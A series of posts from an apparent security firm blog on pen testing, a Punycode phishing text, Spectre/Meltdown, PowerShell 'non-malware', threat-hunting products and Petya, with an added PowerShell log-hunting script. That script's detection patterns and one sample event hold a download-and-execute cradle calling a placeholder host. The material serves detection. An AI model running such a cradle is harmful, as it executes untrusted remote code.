Pen Testing – Confusion or Clarity?

By | Uncategorised

Today I want to discuss (and hopefully clarify) some recent confusion I have been observing around pen testing (penetration testing) requests.  On one hand, we are seeing more and more requests for this type of security service, which is a great thing.  It means cybersecurity awareness is growing, and people are looking to take the next steps to ensure that they aren’t the next headline about a network breach.  On the other hand, we are also starting to see the term “pen testing” used as a catch-all for a few different security services.

First, a couple of definitions…

Vulnerability Assessment (VA):  This is typically an automated scan of network equipment that identifies and reports on theoretical vulnerabilities in things like computer operating systems, installed applications, websites, databases, network services, etc.  In plain terms, if we imagine that your application or network is a locked door, a vulnerability assessment tries to identify all the possible locks that exist on the door.

Penetration Test:  Generally speaking, this is an authorized attempt by an ethical hacker (or Red Team) to exploit identified weaknesses (or vulnerabilities) in order to gain access to a network, an application or an organization.  In other words, a penetration tester has a big bag of “keys” (i.e. tools, techniques, and procedures) and they will attempt to open each theoretical lock or vulnerability with their “keys”.

Now, back to some recent observations…

One of the first things we do at CyberHunter is to try and understand what our clients really mean when they say “I need a pen test”.  Usually, the request falls into one of two camps:

Scenario #1:  “We have a web application and one of our biggest clients needs us to get a 3rd party pen test performed for their risk team”.

Scenario #2: “We are looking to test and improve our overall cybersecurity posture and we need an ethical hacker to try to break into our network.”

These are generalizations, but Scenario #1 is actually MOSTLY a vulnerability assessment, followed by a blend of automated and manual testing that looks for obvious configuration flaws or vulnerabilities that can be exploited without too much effort.  The main goal of this type of test is a remediation report on the issues found, which lets you harden your website, application or network.  This type of testing could also be considered an audit of sorts, particularly when a specific set of metrics is used for compliance measurement (e.g. PCI-DSS compliance).

Scenario #2, however, is a more traditional penetration test.  This type of pen test (also called a Red Team exercise) simulates an adversarial role and is a far more realistic way to test the security readiness of an organization.  This testing covers exploitation attempts against People, Process, and Technology.  It can involve a significant amount of social engineering and usually triggers active security controls and countermeasures inside the operating environment.  These tests additionally assess the responsiveness and/or process of the internal Blue Team (the defensive team) when an intrusion is detected.

Whether you need a Scenario #1 or Scenario #2 engagement, at CyberHunter, we are very happy to see the industry taking proper steps towards a well-balanced cyber hygiene program.  Contact us at evolve@cyberhunter.solutions to take those next steps.

Real Phishing Attack – Canada Revenue Agency Example

By | Uncategorised

I received a mysterious text message the other day, apparently from the Canada Revenue Agency (CRA) telling me to “complete your form, and give us 10 working days to process your claim”. Of course, I always like to observe cyber attack attempts like this first hand to see how complex (or not) the phishing is getting. This one was interesting and is a good lesson on how to spot a phish.

First, there was the message itself, and the exposed URL:

Other than the fact that CRA doesn’t text message you (that I know of), there were some other signs.

First, the phishing link had a French accent in it, which was unusual in a couple of ways.  When a web browser is faced with an accented (Unicode) character in a hostname like café.com, it has to convert it from Unicode (the visually correct looking word) to Punycode (an ASCII representation containing only Letters, Digits and Hyphens – LDH) so that a DNS server can understand it.  Domain Name System services only use ASCII in their records.  (NOTE: IDNA – Internationalizing Domain Names in Applications – encoding exists so web browsers can translate any international domain name (for example, one with accents or double-byte characters) into a recognizable ASCII domain.  These names are first translated to Punycode and then have the prefix “xn--” prepended to the label.  As an example, the Russian top-level domain “рф” is “xn--p1ai” in IDNA.)

So the URL in the text message,

gets translated from the semi-legitimate looking URL you see, to the following below:

Obviously, if you saw the domain in its ASCII Punycode form (shown on the right in the above image), it would look strange and you likely wouldn’t click it.  But an accented letter in a URL is actually a good way for an attacker to get a phishing domain that looks reasonably legit.  (EDITOR’S NOTE:  the Unicode character U+0430 is a small Cyrillic “a” and would have been a better choice than the accented “a”.)  Anyhow, the accent in the string “interac” raised flag #1.

So, the domain shown on the left (with the accent) doesn’t actually exist “as-is” because, as I mentioned, the Domain Name System does not allow non-ASCII records.  The domain on the right does exist, however (even though the site has since been suspended).  A little bit of research into the “real” Punycode domain shows that it is hosted at Namecheap Inc.  This is a discount hosting provider where you can get a hosted server for about $1 per month…another telltale sign of phishing or malware…hackers can be very cheap!

Finally, the most important thing people need to be aware of is WHERE to look in the URL to determine if it is a phish.  In the Punycode URL sent to me, the string “cra-arc.gc.ca” appeared in the URL. This is actually the real domain for the Canada Revenue Agency.  So where should you look?

Some Examples:

In the example httx://abc-555.xyz.def.com/1234-mno.pqr.com, you need to focus on “DEF.COM”.  This is the top-level domain of the web server…and you are ultimately going to a location that is theoretically owned by the owners of “DEF.COM”.

In another example, httx://abc.123.mnop.com, the top-level domain is “MNOP.COM”.

The rule of thumb for how to identify the top-level domain is:

  • look at the two dot-separated fields immediately to the left of the first single forward slash (the first “/” after the “//”), OR
  • if there is no single forward slash, look at the two dot-separated fields at the end of the URL.

When you have these fields, assess whether they look like a real domain.  Of course, this doesn’t completely protect you, mainly because the real domain may have been compromised without the owners knowing it yet, or because you simply don’t know whether the domain is real or not.  When in doubt, always choose NOT to click the link!
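The two checks above (what the hostname becomes on the wire, and which part of it decides where you end up) can be automated. The script below is an added example, not code from the original post: it uses Python’s standard IDNA codec to convert between the displayed name and the “xn--” form DNS actually sees, flags labels that are non-ASCII or mix scripts (the Cyrillic U+0430 trick from the editor’s note), and applies the post’s two-field rule of thumb. The sample URLs are constructed for the example; “httx” is the defanged scheme the post uses, and the mixed-script sample is the reserved name example.com with one letter swapped for U+0430.

```python
import unicodedata
from urllib.parse import urlsplit


def to_ascii(host: str) -> str:
    """Return the IDNA/Punycode form of a hostname: the ASCII string DNS actually stores."""
    return host.encode("idna").decode("ascii")


def to_unicode(host: str) -> str:
    """Return the display form of a hostname, decoding any xn-- labels back to Unicode."""
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeEncodeError:
        return host  # already contains non-ASCII characters, nothing to decode


def scripts_in(label: str) -> set:
    """Unicode scripts (LATIN, CYRILLIC, ...) used by the letters of one hostname label."""
    return {unicodedata.name(ch).split()[0] for ch in label if ch.isalpha()}


def rule_of_thumb_domain(host: str) -> str:
    """The post's rule: the two dot-separated fields at the end of the hostname."""
    return ".".join(host.split(".")[-2:])


def triage_url(url: str) -> dict:
    """Pull the hostname out of a URL and report what a user sees, what DNS resolves,
    which part of it decides where you end up, and any IDN warning signs."""
    host = urlsplit(url).hostname or ""
    display = to_unicode(host)      # what the message shows the recipient
    wire = to_ascii(display)        # what the resolver is asked for
    flags = []
    for label in display.split("."):
        scripts = scripts_in(label)
        if len(scripts) > 1:
            flags.append(f"mixed scripts {sorted(scripts)} in label {label!r}")
        elif not label.isascii():
            flags.append(f"non-ASCII label {label!r} resolves as {to_ascii(label)}")
    return {"display": display, "wire": wire,
            "domain": rule_of_thumb_domain(wire), "flags": flags}


if __name__ == "__main__":
    # Constructed sample URLs; "httx" is the defanged scheme used in the post.
    for sample in ("httx://abc-555.xyz.def.com/1234-mno.pqr.com",
                   "httx://abc.123.mnop.com",
                   "httx://xn--caf-dma.com/claim",
                   "httx://ex\u0430mple.com/login"):   # Latin "ex" + Cyrillic U+0430 + "mple"
        print(triage_url(sample))
```

One limit of the two-field rule shows up on the CRA’s own name: for cra-arc.gc.ca the rule returns gc.ca, which is a public suffix (like co.uk) rather than something one organization registered. Browsers and mail filters use the Public Suffix List to find the registrable domain; the rule of thumb is still a good habit for a human reading a text message, just not the last word.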

One final point…email phishing attacks are still, by far, the number one method of successful cyber attack because they work.  If you are interested in learning how to properly defend against phishing attacks for your company, contact us at evolve@cyberhunter.solutions.  We can help you eliminate the number one method of successful cyber attack in less than the time you spent reading this blog post.

UPDATE: Spectre and Meltdown Mitigation Steps

By | Uncategorised

Two steps you can do right now to help protect you from Spectre and Meltdown:

  1. Verify if new Windows protections are enabled:

    Microsoft’s update process for Windows has been complicated by compatibility issues with quite a few antivirus solutions, making it more difficult for admins to confirm whether their organizations’ machines are protected or not.   To help check, Microsoft has provided a PowerShell script that system administrators can run to verify whether the security updates are in fact installed properly.  Check it out on the Microsoft Support site HERE.

  2. Install browser updates and turn on site isolation

    According to vulnerability researchers, the most likely exploitations of Spectre are web-based attacks using JavaScript to leak information cached in the browser. Mozilla has already issued Firefox version 57.0.4, which includes mitigations for these attacks.  As stated in the last post, Google has announced patches will be included in its next Chrome update scheduled for January 23. In the meantime, both Chrome and Firefox users are advised to turn on site isolation, which can help prevent a site from stealing data from another site.

Spectre and Meltdown

By | Uncategorised

Lots of excitement today as EVERY security company is endlessly discussing Spectre and Meltdown, the exploits affecting almost all systems out there.  Here is the long and short (non-technical) summary of things:

  • Spectre – The name is coined from the term “speculative execution”, and the fact that it will “haunt” us for a long time to come.
  • Meltdown – This name is a reference to how it operates (i.e. it “melts” or destroys the isolation protection that prevents applications from accessing random memory locations).
  • Spectre (CVE-2017-5753 and CVE-2017-5715) affects almost every system with a CPU (laptops, desktops, servers, and even ARM-based devices like smartphones).  Effectively every processor since 1995 (except Intel Itanium and Intel Atom before 2013). It allows an attacker to trick error-free programs, which follow best practices, into leaking their secrets. In fact, the safety checks of said best practices actually increase the attack surface and may make applications more susceptible to Spectre.  Spectre is harder to exploit than Meltdown, but it is also harder to mitigate.
  • Meltdown (CVE-2017-5754) is more specific to Intel CPUs and systems running software-based virtualization like Xen PV or Docker where there is the sharing of a single host’s kernel.  This attack allows a program to access the memory, and thus also the secrets, of other programs and the operating system.  If your computer has a vulnerable processor and runs an unpatched operating system, it is not safe to work with sensitive information without the chance of leaking the information.
  • Can Spectre and/or Meltdown be detected?  Probably not…at least not easily. The exploitation does not leave any traces in traditional log files.  It is possible (in theory) that antivirus will be able to detect / block these attacks in the future, but at the moment it is very difficult to distinguish Meltdown and Spectre exploitation from benign applications.  JavaScript is also capable of exploiting these vulnerabilities, so web browsing is now also a risk.  However, Mozilla has released some tweaks and suggestions to harden the browser, making it more difficult.  Chrome will apparently be issuing a patch on Jan 23rd.
  • Is there a workaround / fix?  There are patches for Windows, Linux and OSX for Meltdown…a simple Google Search will find them.  For Spectre, as it is quite a bit harder to mitigate, there is no patch per se (outside of CPU replacement), but hardening procedures are being worked on to prevent future exploitation.  As this is all quite new, keep monitoring the security blogs for the latest updates on patches, hardening methodologies, and more information.

End of Year Vulnerability Assessments, Pen Tests or Security Compliance Audits?

By | Uncategorised

If you are like many businesses, you may be looking for a quick security assessment of your website, network perimeter, or even your network infrastructure (firewalls, routers, VPNs, etc.).  CyberHunter Solutions is offering rapid vulnerability assessments, penetration tests and security compliance audits for your company.  In most cases these audits can be performed in a single day and provide you with an informative report and peace of mind that you don’t have any obvious gaps in your security settings, application security or device security.

Our vulnerability reporting flavours cover PCI Compliance (certified or pre-audit), ISO 27001/2, SANS, OWASP, CIS, and of course the details around best practices.  If you are about to have a compliance audit, let us come in and do a pre-audit of your infrastructure or endpoints.  We cover compliance areas like Center for Internet Security (encompassing FISMA, HIPAA, PCI, etc.), NIST, US DoD DISA STIG Checklists, SANS, NERC CIP and we can even measure your network against the Open Vulnerability Assessment Language (OVAL) Information Assurance Metrics.

As a Canadian company we are offering additional discounted rates to any clients in the Toronto, Ottawa and Montreal areas.

The Hunt for “Non-Malware”

By | Uncategorised

During a recent penetration test at a client in the Toronto area, we were asked about “non-malware” attacks in the enterprise, and how to spot them.  For those not familiar with “non-malware”, it is an attack that leverages existing software, trusted applications and permitted protocols to perform malicious activities.  On top of that, these types of attacks can typically bypass Anti-virus checks as they are file-less and memory-based attacks that further complicate the job of security controls.

An example of this is the usage of PowerShell.  Nearly every single malicious hacking activity imaginable can be executed using PowerShell in a Windows environment.  Although this tool is the best friend of sysadmins and threat hunters alike, it will also allow malicious activities such as privilege escalation, lateral movement, credential theft, data exfiltration, establishment of persistence, data tampering, etc.  To make things quite a bit worse, an attacker can inject the required .NET assemblies directly into Windows system memory, allowing PowerShell functionality even if the PowerShell executable (powershell.exe) has been removed or blocked throughout the network.

Another nasty example (as discussed recently by the Cisco threat intel team Talos) is a recent Brazilian banking trojan that exploited a fundamental flaw in many security products…the security trust chain.  Basically, many endpoint security solutions assume that if the first executed binary in an application is a trusted one, then any subsequent libraries and dependencies that are called by the “trusted binary” must also be trusted.

In this case, a user clicks the wrong HTML link and, a few redirects later, a trusted VMWare PNG file gets used in the attack sequence.  It calls a malicious DLL (vmwarebase.DLL) that was able to inject more malicious code into explorer.exe, which then allowed the trojan to kill various analyst processes like taskmgr.exe and establish autorun persistence, letting the trojan do its job of targeted web injects focused on people navigating their banking websites at specific Brazilian banks (yes…lots of complex steps to this one, and this is the abbreviated version).  Now, this attack STILL came in the usual way…a phishing email with an attachment…and it should have been filtered, or the end user should know better than to click an HTML attachment, but that’s another story.

The main takeaway here is that, once an attacker has successfully penetrated your network, if you don’t continuously hunt for the things that are successfully evading your traditional security tools and monitoring solutions, you may be in for a nasty surprise.

These things CAN be detected, and as part of a thorough cyber-hygiene program, regularly scheduled threat hunting is the way to do it.  Whether it is PowerShell script-blocks or latent binaries hiding in memory for months on end, a threat hunt is an excellent way to enhance a vulnerability assessment or penetration testing engagement.  Augmenting a VA / Pen Test with a cyber threat hunt brings actual operational risk measurement to these necessary, but theoretical activities.
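What a hunt over PowerShell script blocks looks like in practice, as an added example that is not part of the original post and not CyberHunter’s tooling: Windows Script Block Logging writes the text of every executed block to the Microsoft-Windows-PowerShell/Operational log as Event ID 4104, and the code below runs a handful of indicator patterns over constructed sample events and scores distinct indicators per host, so that a single admin-style Base64 decode does not page anyone but a host that both loads an assembly from memory and pulls code from the network does. The event records, host names and script text are all constructed for the example.

```python
import re

# Constructed sample records shaped like PowerShell Script Block Logging events
# (Microsoft-Windows-PowerShell/Operational, Event ID 4104). These are not real
# captures; the script text was written for this example.
SAMPLE_EVENTS = [
    {"id": 4104, "host": "WS01", "script": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
    {"id": 4104, "host": "WS02", "script": "$b = [Convert]::FromBase64String($blob); [System.Reflection.Assembly]::Load($b) | Out-Null"},
    {"id": 4104, "host": "WS02", "script": "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://PLACEHOLDER/x')"},
    {"id": 4104, "host": "SRV01", "script": "Get-Service | Where-Object Status -eq 'Running'"},
    {"id": 4103, "host": "WS03", "script": "Get-Process"},  # pipeline event, not a script block
]

# Behaviours worth a closer look when they show up in script blocks. None of them is
# malicious on its own; admins use several of them legitimately, which is why the
# hunt scores combinations per host instead of alerting on single matches.
INDICATORS = {
    "reflective_assembly_load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "dynamic_eval": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
}


def indicators_for(event: dict) -> list:
    """Names of the indicators whose pattern appears in one 4104 event's script text."""
    if event["id"] != 4104:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(event["script"])]


def hunt(events: list, threshold: int = 2) -> dict:
    """Group indicator hits by host and return the hosts that reached the threshold
    of distinct indicators, with the sorted list of what fired on each."""
    per_host = {}
    for ev in events:
        hits = indicators_for(ev)
        if hits:
            per_host.setdefault(ev["host"], set()).update(hits)
    return {host: sorted(hits) for host, hits in per_host.items() if len(hits) >= threshold}


if __name__ == "__main__":
    for host, hits in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(hits)}")
```

This only sees what the PowerShell engine logs, so the case the post describes, where the engine’s .NET assemblies are loaded into some other process with powershell.exe gone, needs a second telemetry source: module-load events (for example Sysmon Event ID 7 showing System.Management.Automation.dll loaded by a process that is not a PowerShell host) or a memory hunt across the endpoints.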

Hunt often, and start today.

Threat Hunting – As Easy as Alpha, Bravo, Charlie

By | Uncategorised

There are many reasons WHY organizations need threat hunting as a service, but the number one reason is that DEFENSE IN DEPTH DOES NOT WORK PERFECTLY.  I know that we all love to talk about defense in depth as if somehow, by adding enough defensive layers to the organization (i.e. the perimeter, the network, the hosts, the applications or even the data), every single attack will be stopped.  I mean, the concept of defense in depth was created by the NSA, so it has to be good, right?  How’s that been working out?

Of course, we NEED defense in depth.  I am not saying we don’t.  It is a best practice strategy for achieving information assurance, and it simply has to be done.  However, the evidence is quite clear that malware and APTs will still get through your defenses…no matter who you are, and no matter how many layers you have protecting your network.  Just when we think our collective lips are above the waterline, a new attack or exploit is identified and some poor organization is all over the news with a very public breach.  I just love the phrase “next-generation” when people describe yet another cyber security silver bullet, because it implies that the previous generation didn’t do such a hot job….which of course it didn’t.

Anyhow, if you are an average enterprise in North America, then malware will typically sit inside your network for 6 to 8 months before someone (usually someone external) will find it.  This is called the breach detection gap, and it can be narrowed if you acknowledge four simple guiding principles:

  1. Malware and APTs will breach your defenses.
  2. Never trust an endpoint unless you can prove it should be trusted.
  3. Established trust in an endpoint is a very temporary thing.
  4. Validate endpoints as malware-free, anytime, anyplace with Securitybox.

The Securitybox comes in three configurations (Alpha, Bravo, and Charlie) and can meet the scalability needs of any enterprise threat-hunting requirement:

Alpha: Focusing exclusively on the endpoints (Windows and Linux systems and servers) using agentless technology, this Securitybox configuration is for those who want to manually launch large-scale, on-demand (or scheduled) cyber threat hunts within their network.

Bravo: Designed for those enterprise customers looking for a zero-touch automated cyber threat hunting experience, the Bravo configuration of Securitybox adds an advanced packet analysis engine that monitors network traffic 24/7 looking for anomalous endpoint communication activity (e.g. beaconing, protocol tunneling, exfiltration, etc.). Upon detection of the suspicious network traffic activity, it will immediately launch an agentless endpoint cyber threat hunt that will analyze and validate the suspicion with no false positives.

Charlie: Designed for security analysts and cyber threat hunters who require a full-stack situational awareness of their network, Charlie configuration expands the Securitybox capability by adding access to a visually rich Cyber Intelligence Portal. The Charlie configuration allows analysts to easily explore and query their data, taking cyber threat hunting to the next level.

Practice good cyber hygiene with Securitybox.

Securitybox-Charlie Screenshots

SecurityBox Launches in North America

By | Uncategorised

CyberHunter Solutions is excited to announce the launch of its SecurityBox (http://securitybox.io) cyber threat hunting solution.  Now available in North America and Europe, the SecurityBox is a highly-scalable, agentless threat hunter that can detect and identify latent malware, advanced persistent threats and network breaches BEFORE they become an active attack within the enterprise.

SecurityBox specifically hunts for malware that has successfully evaded existing defences and has established a beachhead within network endpoints, including user devices (laptops, desktops) and servers.  For the first time, reduce malware lifespans in the enterprise from months to minutes.

SecurityBox is available as a fully-managed cyber threat hunting service, or as a DIY solution for internal IT and IT-Security teams.  It can be deployed in minutes as a physical or virtual appliance to meet the needs of the environment.

Designed around the following four principles, SecurityBox provides network owners an ability to quantify TRUE risk by finally understanding their breach detection gap times:

  1. Accept that malware and APTs will breach existing defences, no matter who you are, because cyber security is never perfect.

  2. Always treat endpoints and devices as untrusted, until it can be proven otherwise.

  3. Trust that is established in an endpoint is both finite and fleeting.  Hunt frequently.

  4. Anyone can validate endpoints as malware-free, anytime, anyplace with SecurityBox.

Contact us today to find out about our 90-day threat hunt special offer… evolve@cyberhunter.solutions

WTF – Global IT Leaders are “Safe and Confident” in Perimeter Security?

By | Uncategorised

(Ed:  Keep reading to the end as there is a challenge being offered to any doubters)

I just finished reading an article by Infosecurity Magazine and I guess I have to say that I am somewhere between stunned / shocked /amused, and not at all surprised at the content.  Apparently, the magazine polled 1,000 global IT leaders and asked them if “their perimeter security was effective in keeping unauthorized users out of their network”.  Apparently, 94% of these IT leaders feel their perimeter security IS effective.  In the UK, this number climbs to 96%, with a whopping 58% feeling “extremely confident” in the strength of their perimeter.

Now to be fair, the article also says that another finding of the research was that “68% of respondents claimed that unauthorized people could access their network”.  So now I am confused.  Confident in their perimeter security while unauthorized people are accessing their network.  Hmmmm.

After laughing for a while, I had to stop and think….is this so unusual?  Isn’t this the whole reason that we hear about breach after breach after breach every single day?  Isn’t this overconfidence (or ignorance, or gross negligence, or whatever you want to call sticking your head in the sand like an ostrich) why enterprise organizations are constantly under attack?

How can any organization of size be “extremely confident” that their perimeter security will save them?

Perhaps there are a couple obvious answers:

(1) The IT leaders do not know if they have been breached.  I am quite sure there are a lot of IT leaders in this category.  I have met many of them and they spout the “it hasn’t happened to us” or “it hasn’t hurt us so far” mantra.

Since the average malware dwell time in the network sits somewhere between 3 and 6 months (and over a year in the EMEA region), this would seem to be an accurate observation.  Furthermore, I am not sure they have the tools to actually hunt down the malware that hides in the network, so even if they wanted to know if they were breached, it would be a challenge.

(2) They aren’t acknowledging (or don’t know) that perimeter security is only a very minor part of the overall picture.  Like any successful business structure, proper IT security consists of people, process and controls….and when I say controls, I am talking about a VERY layered set of technologies that have been properly configured to take into account both what it is they are defending (e.g. financial data in a database) and how it impacts their business operations.

Security controls MUST be fully aware of the environment they protect.  At a minimum, they must watch both network communications and endpoint behavior.  IT Sec teams must have the tools necessary to ensure that they do not normalize deviancy in the network.  Identify the suspicious and confirm it so you have high confidence in your response.

Furthermore, and this is just talking about the perimeter that makes these people so comfortable, they must treat every single incoming communication as a potential attack against their network.  As one example, if these IT leaders do not neutralize EVERY SINGLE incoming email (including the neutralization of active content in attachments and embedded links) then they do not even have perimeter security.  Approximately 94% of all cyber attacks come in through email.  So if you don’t thoroughly inspect and neutralize it all with CDR (Content Disarm and Reconstruction), then you don’t really have a perimeter.

Anyhow, perhaps these IT leaders were misquoted or their answers were taken out of context, but I am not so sure. I suppose time will tell if they become the next headline.

So, as a challenge to any IT leader who believes their network is malware-free and they have not yet been breached (possibly because of exceptional perimeter security), CyberHunter Solutions will perform a forensic endpoint investigation of up to 100 Windows or Linux endpoints at no cost.  If you are lucky enough to get a clean bill of health for your network, then you will have the evidence to prove you are doing a great job!  However, you may be quite surprised at what you find hiding inside your enterprise.

Quick Protection from Petya

By | Uncategorised

Just a few quick words on the Petya ransomware as I am sure you have heard enough noise about it:

  • We still believe that it initially enters the network via a phishing email, SO CLEAN YOUR EMAIL WITH CDR
  • Do NOT pay ransom for this as it is unlikely you will be able to reach your attacker as their email accounts have been suspended
  • Even if you are patched against the EternalBlue exploit (MS17-010), there is still a likelihood of lateral propagation, as it uses WMIC and PsExec to worm through the network.  You need to hunt down this malware immediately.
  • The malware looks for the presence of a specific file called “C:\Windows\Perfc” and it terminates if it exists. So it may be a good idea (for now) to create a dummy file with that name as a short-term protection.  Of course, until it morphs to something else.